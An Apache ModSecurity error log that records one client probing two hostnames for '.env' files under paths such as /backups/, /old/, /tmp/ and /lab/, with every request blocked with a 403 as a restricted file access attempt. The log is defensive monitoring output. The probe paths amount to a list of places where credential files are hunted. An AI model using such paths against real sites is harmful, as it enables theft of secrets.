[Mon May 11 16:26:39.192754 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:39488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/backups/.env"] [unique_id "agHnH0WKUxpmnkK7zHx8IwAAAQg"]
[Mon May 11 16:26:39.193315 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:39488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:39.193465 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:39488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/backups/.env"] [unique_id "agHnH0WKUxpmnkK7zHx8IwAAAQg"]
[Mon May 11 16:26:39.822374 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:39494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backup/.env"] [unique_id "agHnHzJnyuKVXoStDha1HAAAAFU"]
[Mon May 11 16:26:39.822610 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:39494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backup/.env"] [unique_id "agHnHzJnyuKVXoStDha1HAAAAFU"]
[Mon May 11 16:26:39.823090 2026] [core:error] [pid 1412074:tid 1412097] [client 18.180.54.2:39494] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:39.823254 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:39494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backup/.env"] [unique_id "agHnHzJnyuKVXoStDha1HAAAAFU"]
[Mon May 11 16:26:39.930235 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:39506] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/old/.env"] [unique_id "agHnHw-Qm4vhlWBPlMi6NwAAABc"]
[Mon May 11 16:26:39.930472 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:39506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/old/.env"] [unique_id "agHnHw-Qm4vhlWBPlMi6NwAAABc"]
[Mon May 11 16:26:39.930945 2026] [core:error] [pid 1411099:tid 1411123] [client 18.180.54.2:39506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:39.931092 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:39506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/old/.env"] [unique_id "agHnHw-Qm4vhlWBPlMi6NwAAABc"]
[Mon May 11 16:26:40.506193 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:39508] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backups/.env"] [unique_id "agHnIFV4kyjgo4bQBUhUcAAAAMU"]
[Mon May 11 16:26:40.506424 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:39508] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backups/.env"] [unique_id "agHnIFV4kyjgo4bQBUhUcAAAAMU"]
[Mon May 11 16:26:40.506892 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:39508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:40.507049 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:39508] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backups/.env"] [unique_id "agHnIFV4kyjgo4bQBUhUcAAAAMU"]
[Mon May 11 16:26:40.634242 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:39522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/tmp/.env"] [unique_id "agHnIDJnyuKVXoStDha1HQAAAE4"]
[Mon May 11 16:26:40.634490 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:39522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/tmp/.env"] [unique_id "agHnIDJnyuKVXoStDha1HQAAAE4"]
[Mon May 11 16:26:40.634960 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:39522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:40.635110 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:39522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/tmp/.env"] [unique_id "agHnIDJnyuKVXoStDha1HQAAAE4"]
[Mon May 11 16:26:41.188010 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:39534] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/old/.env"] [unique_id "agHnIfy_GXSWIKeli0vyeAAAAJM"]
[Mon May 11 16:26:41.188262 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:39534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/old/.env"] [unique_id "agHnIfy_GXSWIKeli0vyeAAAAJM"]
[Mon May 11 16:26:41.188735 2026] [core:error] [pid 1411201:tid 1411424] [client 18.180.54.2:39534] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:41.188891 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:39534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/old/.env"] [unique_id "agHnIfy_GXSWIKeli0vyeAAAAJM"]
[Mon May 11 16:26:41.357291 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:39540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/temp/.env"] [unique_id "agHnITJnyuKVXoStDha1HwAAAFE"]
[Mon May 11 16:26:41.357464 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:39540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/temp/.env"] [unique_id "agHnITJnyuKVXoStDha1HwAAAFE"]
[Mon May 11 16:26:41.357979 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:39540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:41.358133 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:39540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/temp/.env"] [unique_id "agHnITJnyuKVXoStDha1HwAAAFE"]
[Mon May 11 16:26:41.881609 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:39552] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/tmp/.env"] [unique_id "agHnIfy_GXSWIKeli0vyegAAAJQ"]
[Mon May 11 16:26:41.881838 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:39552] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/tmp/.env"] [unique_id "agHnIfy_GXSWIKeli0vyegAAAJQ"]
[Mon May 11 16:26:41.882332 2026] [core:error] [pid 1411201:tid 1411265] [client 18.180.54.2:39552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:41.882489 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:39552] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/tmp/.env"] [unique_id "agHnIfy_GXSWIKeli0vyegAAAJQ"]
[Mon May 11 16:26:42.135823 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:39564] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/lab/.env"] [unique_id "agHnIlV4kyjgo4bQBUhUcwAAAMc"]
[Mon May 11 16:26:42.136036 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:39564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/lab/.env"] [unique_id "agHnIlV4kyjgo4bQBUhUcwAAAMc"]
[Mon May 11 16:26:42.136568 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:39564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:42.136725 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:39564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/lab/.env"] [unique_id "agHnIlV4kyjgo4bQBUhUcwAAAMc"]
[Mon May 11 16:26:42.653925 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:39574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/temp/.env"] [unique_id "agHnIlV4kyjgo4bQBUhUdAAAAMs"]
[Mon May 11 16:26:42.654172 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:39574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/temp/.env"] [unique_id "agHnIlV4kyjgo4bQBUhUdAAAAMs"]
[Mon May 11 16:26:42.654662 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:39574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:42.654815 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:39574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/temp/.env"] [unique_id "agHnIlV4kyjgo4bQBUhUdAAAAMs"]
[Mon May 11 16:26:42.820371 2026] [security2:error] [pid 1412074:tid 1412088] [client 18.180.54.2:39590] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cronlab/.env"] [unique_id "agHnIjJnyuKVXoStDha1IAAAAEw"]
[Mon May 11 16:26:42.820595 2026] [security2:error] [pid 1412074:tid 1412088] [client 18.180.54.2:39590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cronlab/.env"] [unique_id "agHnIjJnyuKVXoStDha1IAAAAEw"]
[Mon May 11 16:26:42.821078 2026] [core:error] [pid 1412074:tid 1412088] [client 18.180.54.2:39590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:42.821713 2026] [security2:error] [pid 1412074:tid 1412088] [client 18.180.54.2:39590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cronlab/.env"] [unique_id "agHnIjJnyuKVXoStDha1IAAAAEw"]
[Mon May 11 16:26:43.393311 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:39598] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/lab/.env"] [unique_id "agHnIw-Qm4vhlWBPlMi6PAAAABM"]
[Mon May 11 16:26:43.393479 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:39598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/lab/.env"] [unique_id "agHnIw-Qm4vhlWBPlMi6PAAAABM"]
[Mon May 11 16:26:43.393970 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:39598] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:43.394123 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:39598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/lab/.env"] [unique_id "agHnIw-Qm4vhlWBPlMi6PAAAABM"]
